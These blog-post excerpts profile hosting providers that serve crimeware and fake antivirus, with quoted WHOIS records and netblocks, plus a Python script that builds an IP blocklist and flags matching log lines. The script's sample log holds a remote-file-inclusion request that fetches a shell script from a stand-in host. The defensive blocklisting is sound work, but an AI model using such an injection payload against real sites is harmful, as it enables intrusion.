Sources of Badness – Still Trade LTD

The absolute worst culprit that I’ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here.
person: [...]

Sources of Badness – Starline Web Services

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C, as reported by FireEye.
inetnum: 92.62.101.0 – 92.62.101.255
netname: STARLINE_EE
descr: Starline Web [...]

Sources of Badness – PortNAP

One of the smaller hosts I’ve identified is PortNAP Internet Services. They appear to get their upstream connectivity from Grafix Internet B.V. We’ve seen fake anti-virus served from three of their IPs, spread across two different /24 subnets registered to PortNAP (84.243.196.0 – 84.243.197.255).

inetnum: 84.243.197.0 – 84.243.197.255
netname: [...]

Sources of Badness – ZlKon

After a weekend hiatus, I’m back with the next host of interest – ZlKon.
role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: [...]

Sources of Badness – UATelecom

The next source of badness I’ll cover is UATelecom (AS44997). With only a /22 (1,024 addresses), this host is much smaller than LeaseWeb. A Swiss blogger also had a run-in with this host, which you can read about here (written in German).
91.203.92.0/22
AS44997
netname: BASTION-NET
descr: [...]
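The netblocks quoted in the Starline, PortNAP and UATelecom write-ups above are given partly as CIDR prefixes and partly as RIR-style "first – last" inetnum ranges. As an added example (not code from the original posts), the script below turns both notations into networks, answers "which listed block does this address fall into?", and runs that check over a few web-server log lines. The log lines are constructed for the example; the Still Trade /24 is omitted because its prefix is not printed on this page. Netblocks change hands, so re-check the RIR record before acting on an old list like this one.

```python
import ipaddress
import re

# Netblocks named in the posts on this page (from their WHOIS/RIR excerpts).
# Still Trade LTD (AS47486) is not included: its prefix is not printed here.
LISTED_BLOCKS = [
    ("STARLINE_EE", "92.62.101.0 – 92.62.101.255"),      # inetnum range, en dash
    ("PortNAP", "84.243.196.0 - 84.243.197.255"),        # inetnum range, hyphen
    ("BASTION-NET (AS44997)", "91.203.92.0/22"),         # CIDR prefix
]

# Matches "first - last" or "first – last" (RIR inetnum style); CIDR does not match.
_RANGE_RE = re.compile(r"^\s*(\S+)\s*[-\u2013]\s*(\S+)\s*$")


def parse_block(text):
    """Return the list of networks covering a CIDR string or an inetnum range."""
    m = _RANGE_RE.match(text)
    if m:
        first = ipaddress.ip_address(m.group(1))
        last = ipaddress.ip_address(m.group(2))
        if last < first:
            raise ValueError(f"inverted range: {text!r}")
        # An arbitrary range may need several prefixes; summarize_address_range
        # yields the minimal set (84.243.196.0-84.243.197.255 -> one /23).
        return list(ipaddress.summarize_address_range(first, last))
    return [ipaddress.ip_network(text.strip(), strict=False)]


def build_blocklist(entries):
    """Flatten (name, text) pairs into (name, network) pairs."""
    blocklist = []
    for name, text in entries:
        for net in parse_block(text):
            blocklist.append((name, net))
    return blocklist


def block_size(text):
    """Number of addresses covered by a block string (a /22 is 1024)."""
    return sum(net.num_addresses for net in parse_block(text))


def lookup(ip, blocklist):
    """Return the name of the listed block containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    for name, net in blocklist:
        if addr in net:
            return name
    return None


# Constructed sample log lines (Apache common log format) for the example only.
SAMPLE_LOG = """\
91.203.93.7 - - [10/Jan/2009:10:00:01 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2009:10:00:02 +0000] "GET / HTTP/1.1" 200 1024
84.243.197.200 - - [10/Jan/2009:10:00:03 +0000] "GET /av.exe HTTP/1.1" 200 20480
not-an-ip - - [10/Jan/2009:10:00:04 +0000] "GET / HTTP/1.1" 400 0
"""


def flag_log_lines(log_text, blocklist):
    """Return (client_ip, block_name) for each line whose client is in a listed block."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=1)
        if not parts:
            continue
        try:
            name = lookup(parts[0], blocklist)
        except ValueError:          # malformed client field, skip the line
            continue
        if name is not None:
            hits.append((parts[0], name))
    return hits


if __name__ == "__main__":
    bl = build_blocklist(LISTED_BLOCKS)
    for ip, name in flag_log_lines(SAMPLE_LOG, bl):
        print(f"{ip:16} -> {name}")
```

The matcher is a linear scan, which is fine for a handful of blocks; for a large feed, key the networks by prefix length and do a longest-prefix lookup, or load them into a radix tree.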

Sources of Badness – LeaseWeb

**Edit 2**
I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of notifying [...]